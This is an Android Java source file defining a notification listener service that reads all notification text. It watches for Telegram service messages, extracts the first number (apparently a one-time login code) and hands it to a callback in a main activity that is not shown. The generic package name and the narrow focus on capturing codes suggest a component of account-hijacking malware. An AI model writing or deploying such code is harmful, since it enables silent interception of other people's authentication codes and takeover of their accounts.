package com.example.notifyservice;

import android.app.Notification;
import android.content.Intent;
import android.os.Build;
import android.os.IBinder;
import android.service.notification.NotificationListenerService;
import android.service.notification.StatusBarNotification;
import android.util.Log;

public class Listener extends NotificationListenerService {


    String previousMessageText = "";

    @Override
    public IBinder onBind(Intent intent) {
        return super.onBind(intent);
    }

    private static String extractFirstNumber(String input) {
        if (input == null || input.isEmpty()) {
            return null;
        }

        StringBuilder number = new StringBuilder();
        boolean foundDigit = false;

        for (char c : input.toCharArray()) {
            if (Character.isDigit(c)) {
                number.append(c);
                foundDigit = true;
            } else if (foundDigit) {
                break;
            }
        }

        return number.length() > 0 ? number.toString() : "";
    }

    @Override
    public void onNotificationPosted(StatusBarNotification sbn){
        String text = getNotificationText(sbn);
        if(getShortcutSafe(sbn).isEmpty() && !text.isEmpty())
            previousMessageText = text;
        if(getShortcutSafe(sbn).equals("ndid_777000") && previousMessageText.startsWith("Telegram:")){
            String code = extractFirstNumber(previousMessageText);
            if(!code.isEmpty()) {
                MainActivity.codeCallback(this, code);
            }
        }
    }

    private String getShortcutSafe(StatusBarNotification sbn) {
        String shortcutId = null;
        if (android.os.Build.VERSION.SDK_INT >= android.os.Build.VERSION_CODES.O) {
            shortcutId = sbn.getNotification().getShortcutId();
        } else {
            shortcutId = "ndid_777000";
        }
        return shortcutId == null ? "" : shortcutId;
    }

    private String getNotificationText(StatusBarNotification sbn) {
        Notification notification = sbn.getNotification();
        CharSequence tickerText = notification.tickerText;
        return tickerText == null ? "" : tickerText.toString() ;
    }
}